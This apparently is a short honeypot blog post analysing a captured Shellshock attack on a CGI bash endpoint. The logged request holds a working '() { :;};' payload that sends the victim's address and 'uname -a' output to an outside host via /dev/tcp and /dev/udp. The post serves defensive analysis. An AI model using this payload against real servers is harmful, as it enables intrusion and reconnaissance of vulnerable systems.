Donnerstag, 18. Juni 2015

Shellinjection attack: /dev/tcp/74.208.79.34/21 -- bash echo

My Honeypot was attacked by
Jun 18 06:42:08 beeswarm [mypyfwa] 2015-06-18 06:42:08.029145 213.165.70.245 - - [17/Jun/2015:16:11:21 +0200] "GET /cgi-bin/bash HTTP/1.1" 404 529 "() { :;}; /bin/bash -c \"echo 109.234.106.8/cgi-bin/bash  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/cgi-bin/bash > /dev/udp/74.208.79.34/21\"" "() { :;}; /bin/bash -c \"echo 109.234.106.8/cgi-bin/bash  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/cgi-bin/bash > /dev/udp/74.208.79.34/21\"" 213.165.70.245 DE SHELLinjection
So, what is happening here:
  1. I needed to ask the experts on what could be done via "> /dev/tcp/74.208.79.34/21", the result is quite simple, a feature by the bash could lead to opening a tcp connection to 74.208.79.34 port 21
  2. The attacker tried to report the vulnerability of my server to the ip address within the attack.
  3. He tried it via UDP and TCP
The source of the attack was:  213.165.70.245 which is a server hosted by "1&1 Internet Inc."

The reporting destination was:  74.208.79.34 which is a server hosted by the same company.